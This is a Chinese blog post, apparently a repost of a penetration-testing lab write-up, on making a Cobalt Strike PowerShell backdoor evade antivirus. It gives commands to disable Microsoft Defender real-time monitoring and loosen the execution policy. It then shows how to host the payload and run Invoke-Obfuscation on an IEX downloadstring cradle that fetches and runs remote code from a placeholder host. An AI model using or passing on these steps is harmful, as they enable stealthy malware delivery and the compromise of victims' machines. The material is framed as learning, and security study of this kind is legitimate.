当前位置:   article > 正文

利用Invoke-Obfuscation工具进行Powershell恶意脚本免杀_cs的powershell免杀

cs的powershell免杀

目录

一、实验内容

二、实验环境

三、实验过程与分析

附invoke-obfuscation的部分操作指令:


前言:记录渗透学习中的实验过程

一、实验内容

1、利用Cobaltstrike生成Powershell恶意脚本,并通过Powershell关闭Microsoft Defender防病毒软件以达到免杀目的

2、利用Invoke-Obfuscation工具进行Powershell恶意脚本免杀
 

二、实验环境

操作环境:Windows10、kali

软件:Cobaltstrike、Invoke-Obfuscation

三、实验过程与分析

1、 利用Cobaltstrike生成Powershell恶意脚本,并通过Powershell关闭Microsoft Defender防病毒软件以达到免杀目的

关闭防病毒软件实时扫描功能——>输入Set-ExecutionPolicy Unrestricted

改变当前的 PowerShell 环境的权限设置(注意,此命令需要在管理员权限的powershell 下运行)

命令解释

- Unrestricted: 允许所有的脚本运行, 但是在运行前会提示是否进行操作

尽管Microsoft Defender提供了禁用杀毒软件的命令,但它受防篡改功能的保护,你只能通过Windows安全应用程序中提供的“病毒和威胁防护”设置来禁用它。

若要禁用防病毒,请关闭“防篡改”,然后使用以下步骤:

Set-MpPreference -DisableRealtimeMonitoring $true

完成这些步骤后,实时防病毒保护将被禁用,直到下次重新启动为止。

2、cs中生成powershell脚本

打开cs,按图示点击

然后生成powershell后门

选择保存路径

文件托管中,选择刚生成的powershell文件

端口选择

成功启动服务

 

2、利用Invoke-Obfuscation工具进行Powershell恶意脚本免杀

先在powershell中执行Set-ExecutionPolicy Unrestricted(预防后面报错)

然后选择输入A(全是)

①接着用PowerShell的import-module命令导入Invoke-Obfuscation模块

②或者先切换到Invoke-Obfuscation的文件夹,然后执行Import-Module .\Invoke-Obfuscation.psd1;Invoke-Obfuscation

①②任选一种方法即可

。。。。。。(跳过下面这个无法执行的part)

设置目标脚本文件(出现下图这个红字警告时,.ps1文件大概率已经没啦)

输入set scriptpath C:\Users\XG\Documents\payload.ps1

设置并选择混淆方式

。。。。。。(无法执行的part结束)

前面红字报错的地方,换一条命令输入(这条命令可以成功执行)

set scriptblock 'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x:80/b'))"'

注:这条命令里的80改为自己设置的powershell脚本的端口号

http://x.x.x.x 改为在cs文件托管【成功启动服务】后生成的url地址

然后输入encoding选择编码方式(成功执行!!!)

输出混淆后的脚本

(会自动弹出混淆后的脚本)

附invoke-obfuscation的部分操作指令:

输入back可返回上一级目录

输入undo可撤销上次命令(比如重新指定编码方式的时候,就可以使用)

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/知新_RL/article/detail/152877
推荐阅读
相关标签
  

闽ICP备14008679号